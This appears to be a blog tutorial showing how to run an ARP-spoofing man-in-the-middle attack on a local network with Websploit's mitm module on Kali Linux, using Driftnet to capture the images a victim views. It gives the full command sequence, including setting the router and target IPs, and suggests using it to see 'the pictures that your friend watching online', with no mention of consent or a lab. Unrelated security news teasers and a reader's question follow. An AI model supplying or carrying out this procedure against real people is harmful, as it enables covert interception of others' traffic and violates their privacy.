How we can launch a MITM attack with Websploit and the Driftnet – Tool used to capture images.
MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.
Step 1: Need to install websploit in Kali if not present.
root@kali:~# apt-get install websploit
Step2: To Run the websploit
root@kali:~# websploit
Step 3: Next we need to list the modules with the websploit.
wsf > show modules
Step 4: Need to select network/mitm under Network modules.
wsf > use network/mitm
wsf:MITM > show options
Interface: Need to specify the network adapter interface based on our network adapter.
Router: Need to specify Router IP, which can be found with the command route -n.
set Router (Gateway IP)
Target: The victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.
Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occur after that sniffers will start up.
wsf:MITM > run
Step 6: Now go down to the victim machine and start surfing, all the images would be captured by drifnet.
Here you can find the pictures that your friend watching online.
If you have any doubt please don’t hesitate to leave a comment.
GitLab has urgently released security updates to address multiple high-severity vulnerabilities in its platform that…
A high-severity security vulnerability (CVE-2025-0514) in LibreOffice, the widely used open-source office suite, has been…
Cisco Systems has disclosed a high-severity vulnerability (CVE-2025-20111) in its Nexus 3000 and 9000 Series…
A sophisticated cyber campaign orchestrated by the Chinese Advanced Persistent Threat (APT) group, Silver Fox,…
A new wave of cyberattacks attributed to the Ghostwriter Advanced Persistent Threat (APT) group has…
The LCRYX ransomware, a malicious VBScript-based threat, has re-emerged in February 2025 after its initial…
View Comments
as you mentioned above (Victim machine IP address, can be found with ipconfig for windows and ifconfig for Linux.) for this we need the physical access to the victims machine right? I'm confused here please help me!